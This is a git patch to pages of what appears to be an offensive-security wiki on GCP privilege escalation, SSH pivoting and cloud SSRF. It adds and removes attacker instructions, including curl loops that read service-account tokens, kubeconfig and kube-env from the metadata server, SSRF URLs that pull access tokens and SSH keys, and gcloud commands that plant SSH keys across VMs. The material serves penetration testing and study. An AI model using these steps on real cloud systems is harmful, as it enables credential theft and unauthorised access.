From 428691a66033f7bd82f6cef3369a14c3ff2ff7e9 Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 13 Feb 2022 18:46:11 +0000 Subject: [PATCH] GitBook: [#3009] No subject --- .../gcp-privesc-to-other-principals.md | 32 ------- ...local-privilege-escalation-ssh-pivoting.md | 42 ++++----- .../cloud-ssrf.md | 90 ++++--------------- 3 files changed, 40 insertions(+), 124 deletions(-) diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md index fba5442f..b5a50e60 100644 --- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md +++ b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md @@ -154,38 +154,6 @@ For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-pri **Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API). -## compute - -### compute.projects.setCommonInstanceMetadata - -With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ -Limitations: - -* Note that GCP Service Accounts running in VM instances by default have a **very limited scope** -* You will need to be **able to contact the SSH** server to login - -For more information about how to exploit this permission check: - -{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -### compute.instances.setMetadata - -This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**. - -### compute.instances.setIamPolicy - -This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. - -### **compute.instances.osLogin** - -If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance. - -### **compute.instances.osAdminLogin** - -If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance. - ## container ### container.clusters.get diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md index 15c6f6f2..756d8588 100644 --- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md +++ b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md @@ -48,6 +48,8 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic * `https://www.googleapis.com/auth/compute` * `https://www.googleapis.com/auth/cloud-platfo`rm +## **Add SSH keys** + ### **Add SSH keys to custom metadata** **Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**. @@ -147,7 +149,26 @@ gcloud compute ssh [INSTANCE NAME] This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods. -### SSH keys at project level +## **Using OS Login** + +[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. + +OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`. + +OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`. + +The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level: + +* **roles/compute.osLogin** (no sudo) +* **roles/compute.osAdminLogin** (has sudo) + +Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted. + +If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above. + +Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network. + +## SSH keys at project level Following the details mentioned in the previous section you can try to compromise more VMs. @@ -159,25 +180,6 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes. -## **Using OS Login** - -****[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) **** is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. - -OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`. - -OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`. - -The following two **IAM permissions control SSH access to instances with OS Login enabled**. They can be applied at the project or instance level: - -* **compute.instances.osLogin** (no sudo) -* **compute.instances.osAdminLogin** (has sudo) - -Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted. - -If your service account has these permissions. **You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor** is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above. - -Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network. - ## Search for Keys in the filesystem It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this. diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index bb556167..a47100f5 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -92,81 +92,21 @@ Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACC ### SSRF URL for Google Cloud -Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs: +Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True” -* http://169.254.169.254 -* http://metadata.google.internal -* http://metadata +``` +http://169.254.169.254/computeMetadata/v1/ +http://metadata.google.internal/computeMetadata/v1/ +http://metadata/computeMetadata/v1/ +http://metadata.google.internal/computeMetadata/v1/instance/hostname +http://metadata.google.internal/computeMetadata/v1/instance/id +http://metadata.google.internal/computeMetadata/v1/project/project-id +``` -Interesting endpoints to extract information: +Google allows recursive pulls -```bash -# /project -## Project name and number -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id -## Project attributes -curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/project/attributes/?recursive=true - -# /oslogin -## users -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/users -## groups -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/groups -## security-keys -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/security-keys -## authorize -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/authorize - -# /instance -## Description -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description -## Hostname -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname -## ID -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id -## Image -curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image -## Machine Type -curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/machine-type -## Name -curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name -## Tags -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags -## Zone -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone -## Network Interfaces -for iface in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do - echo " IP: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip") - echo " Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask") - echo " Gateway: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway") - echo " DNS: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers") - echo " Network: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network") - echo " ============== " -done -## Service Accounts -for sa in $(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do - echo " Name: $sa" - echo " Email: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/email") - echo " Aliases: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/aliases") - echo " Identity: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/identity") - echo " Scopes: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/scopes") - echo " Token: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token") - echo " ============== " -done -## K8s Attributtes -### Cluster location -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-location -### Cluster name -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-name -### Os-login enabled -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin -### Kube-env -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-env -### Kube-labels -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-labels -### Kubeconfig -curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig +``` +http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true ``` Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn) @@ -176,6 +116,12 @@ http://metadata.google.internal/computeMetadata/v1beta1/ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true ``` +Interesting files to pull out: + +* SSH Public Key : [`http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json) +* Get Access Token : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`](http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token) +* Kubernetes Key : [`http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`](http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json) + ### Add an SSH key Extract the token